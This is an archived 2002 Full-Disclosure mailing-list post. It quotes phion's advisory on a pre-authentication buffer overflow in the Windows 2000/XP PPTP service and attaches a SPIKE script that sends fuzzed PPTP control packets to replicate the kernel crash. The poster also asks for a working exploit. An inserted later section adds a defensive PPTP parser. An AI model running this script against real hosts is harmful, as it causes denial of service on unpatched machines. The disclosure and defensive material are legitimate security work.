
List:       full-disclosure
Subject:    [Full-Disclosure] Re: Microsoft PPTP Server and Client remote vulnerability
From:       Dave Aitel <dave () immunitysec ! com>
Date:       2002-09-26 20:13:21


SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)


-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already. 
P.P.S. This script is released under the terms of the GNU GPL v 2.0.


On Thu, 2002-09-26 at 05:43, sh@phion.com wrote:
> phion Security Advisory 26/09/2002
> 
> Microsoft PPTP Server and Client remote vulnerability
> 
> 
> Summary
> -----------------------------
> 
>    The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
>    remotely exploitable pre-authentication buffer overflow.
> 
> 
> Affected Systems
> -----------------------------
> 
>    Microsoft Windows 2000 and XP running either a PPTP Server or Client.
> 
> 
> Impact
> -----------------------------
> 
>    With a specially crafted PPTP packet it is possible to overwrite kernel
>    memory.
> 
>    A DoS resulting in a lockup of the machine has been verified on
>    Windows 2000 SP3 and Windows XP.
> 
>    A remote compromise should be possible deploying proper shellcode,
>    as we were able to fill EDI and EDX with our data.
> 
>    Clients are vulnerable too, because the Service always listens on port
>    1723 on any interface of the machine; this might be of special concern
>    to DSL users who use PPTP to connect to their modem.
> 
> 
> Solution
> -----------------------------
> 
>    As a temporary solution for the Client issue, one might firewall the PPTP
>    port in the Internet Connection Firewall for Windows XP.
> 
>    We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
> 
>    The vendor has been informed.
> 
> 
> Acknowledgements
> -----------------------------
> 
>    The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
>    on behalf of phion Information Technologies.
> 
> 
> Contact Information
> -----------------------------
> 
>    phion Information Technologies can be reached via:
>       office@phion.com / http://www.phion.com
> 
>    Stephan Hoffmann can be reached via:
>       sh@phion.com
> 
>    Thomas Unterleitner can be reached via:
>       t.unterleitner@phion.com
> 
> References
> -----------------------------
> 
>    [1] phion Information Technologies
>        http://www.phion.com/
> 
> Exploit
> -----------------------------
> 
>    phion Information Technologies will not provide an exploit for this issue.
> 
> 
> Disclaimer
> -----------------------------
> 
>    This advisory does not claim to be complete or to be usable for any
>    purpose.
> 
>    This advisory is free for open distribution in unmodified form.
> 
>    Articles or Publications that are based on information from this advisory
>    have to include link [1].
> 
> 


["pptp.spk" (pptp.spk)]

//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 -  control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b  3c 4d");
//type 1 -  start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);

//hostname
s_string_variable("A");
s_binary_repeat("00",63);

//vendor
s_string_variable("A");
s_binary_repeat("00",63);

s_block_end("PPTP");


///
/// NEXT PACKET
///
///

//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 -  control request
s_int_variable(0x0001,5);

//cookie
s_binary("1a 2b  3c 4d");
//type 7 -  outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");

//call id
s_binary("0000");

//serial number
s_binary("0000");

//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");

s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");





["signature.asc" (application/pgp-signature)]
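The .spk above hand-encodes the two RFC 2637 control messages, Start-Control-Connection-Request (control type 1) and Outgoing-Call-Request (control type 7). As an added example, not from Dave's post, SPIKE or phion's advisory, here is a receiver-side parser in Python that validates those two messages before any field is trusted: the declared length against both the RFC-fixed message size and the bytes actually received, the magic cookie, the phone-number length field against its 64-octet container, and the 64-octet name fields. The advisory does not say which field overflows, so these are generic framing checks, not a signature for this bug. The rule that every name field must contain a NUL, and the build_* helpers that construct the sample messages (using the same constants the .spk sends), are this example's own.

```python
"""Defensive parser for PPTP SCCRQ (type 1) and OCRQ (type 7) control messages.

Added example; not code from the post, SPIKE or phion.  Field layout is from
RFC 2637.  The 'names must contain a NUL' rule is this example's own policy.
"""
import struct

PPTP_MAGIC_COOKIE = 0x1A2B3C4D
MSG_CONTROL = 1                       # PPTP message type: control message
SCCRQ, OCRQ = 1, 7                    # control message types handled here
FIXED_LEN = {SCCRQ: 156, OCRQ: 168}   # total on-wire size of each message (RFC 2637)
NAME_FIELD = 64                       # hostname/vendor/phone/subaddress are 64 octets


def _checked_name(field: bytes, what: str) -> bytes:
    """Return the name without padding; reject if the 64-byte field holds no NUL.

    RFC 2637 only says shorter names are zero padded.  Requiring a terminator is
    a deliberately conservative policy (assumption of this example) so the value
    can never be handled as an unterminated C string further down the stack."""
    if len(field) != NAME_FIELD:
        raise ValueError(f"{what}: field is {len(field)} bytes, expected {NAME_FIELD}")
    nul = field.find(b"\x00")
    if nul < 0:
        raise ValueError(f"{what}: no NUL terminator within {NAME_FIELD} bytes")
    return field[:nul]


def parse_control_message(data: bytes) -> dict:
    """Validate the common 12-byte header, then decode SCCRQ or OCRQ fields.

    Raises ValueError on any inconsistency between declared and actual sizes."""
    if len(data) < 12:
        raise ValueError("short PPTP control header")
    length, msg_type, cookie, ctrl_type, _res0 = struct.unpack("!HHIHH", data[:12])
    if cookie != PPTP_MAGIC_COOKIE:
        raise ValueError(f"bad magic cookie {cookie:#010x}")
    if msg_type != MSG_CONTROL:
        raise ValueError(f"unexpected PPTP message type {msg_type}")
    if ctrl_type not in FIXED_LEN:
        raise ValueError(f"unsupported control message type {ctrl_type}")
    # The declared length must match both the RFC-defined size and what we hold.
    if length != FIXED_LEN[ctrl_type]:
        raise ValueError(f"type {ctrl_type}: length {length}, expected {FIXED_LEN[ctrl_type]}")
    if length != len(data):
        raise ValueError(f"length field {length} but {len(data)} bytes received")

    if ctrl_type == SCCRQ:
        version, _res1, framing, bearer, max_chan, fw_rev = struct.unpack("!HHIIHH", data[12:28])
        return {
            "type": "SCCRQ", "version": version, "framing": framing, "bearer": bearer,
            "max_channels": max_chan, "firmware": fw_rev,
            "hostname": _checked_name(data[28:92], "hostname"),
            "vendor": _checked_name(data[92:156], "vendor"),
        }

    (call_id, serial, min_bps, max_bps, bearer, framing,
     recv_win, delay, phone_len, _res1) = struct.unpack("!HHIIIIHHHH", data[12:40])
    # The phone-number length is itself peer-controlled: bound it to the 64-octet
    # field before it is used for anything, and require it to match the content.
    if phone_len > NAME_FIELD:
        raise ValueError(f"phone number length {phone_len} exceeds {NAME_FIELD}")
    phone = _checked_name(data[40:104], "phone number")
    if len(phone) != phone_len:
        raise ValueError(f"phone number length {phone_len} disagrees with content ({len(phone)})")
    return {
        "type": "OCRQ", "call_id": call_id, "serial": serial, "min_bps": min_bps,
        "max_bps": max_bps, "bearer": bearer, "framing": framing,
        "recv_window": recv_win, "delay": delay, "phone": phone,
        "subaddress": _checked_name(data[104:168], "subaddress"),
    }


def rejects(data: bytes) -> bool:
    """True if the parser refuses the message (convenience for callers and tests)."""
    try:
        parse_control_message(data)
        return False
    except ValueError:
        return True


# --- constructed sample messages (not captured traffic); constants mirror the .spk ---
def build_sccrq(hostname: bytes, vendor: bytes) -> bytes:
    """Well-formed SCCRQ: version 1.0, Ethernet framing (3), digital bearer (2)."""
    hdr = struct.pack("!HHIHH", FIXED_LEN[SCCRQ], MSG_CONTROL, PPTP_MAGIC_COOKIE, SCCRQ, 0)
    body = struct.pack("!HHIIHH", 0x0100, 0, 3, 2, 0xFFFF, 1)
    return hdr + body + hostname[:63].ljust(64, b"\x00") + vendor[:63].ljust(64, b"\x00")


def build_ocrq(phone: bytes, subaddress: bytes = b"") -> bytes:
    """Well-formed OCRQ: 2400..10000000 bps, digital bearer, Ethernet framing."""
    hdr = struct.pack("!HHIHH", FIXED_LEN[OCRQ], MSG_CONTROL, PPTP_MAGIC_COOKIE, OCRQ, 0)
    phone = phone[:63]
    body = struct.pack("!HHIIIIHHHH", 1, 1, 2400, 10_000_000, 2, 3, 3, 0, len(phone), 0)
    return hdr + body + phone.ljust(64, b"\x00") + subaddress[:63].ljust(64, b"\x00")


if __name__ == "__main__":
    print(parse_control_message(build_sccrq(b"pac.example", b"example-vendor")))
    print(parse_control_message(build_ocrq(b"5551234")))
    print("truncated message rejected:", rejects(build_sccrq(b"h", b"v")[:100]))
```

The checks are ordered so that nothing derived from the message (the declared length, the phone-number length) is used as an index or a size until it has been compared with the fixed RFC layout and with the byte count actually received; that ordering, rather than any one check, is what keeps a parser like this from being steered by its input.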
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
